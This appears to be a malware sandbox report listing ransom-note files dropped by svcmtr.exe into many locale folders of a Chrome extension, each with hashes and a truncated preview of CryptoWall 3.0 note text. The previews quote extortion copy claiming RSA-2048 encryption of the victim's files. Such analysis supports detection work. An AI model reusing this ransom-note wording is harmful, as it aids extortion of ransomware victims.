                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\pa\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\pl\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\pl\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\pt_BR\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\pt_BR\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\pt_PT\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\pt_PT\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ro\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ro\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ru\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ru\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\si\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\si\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
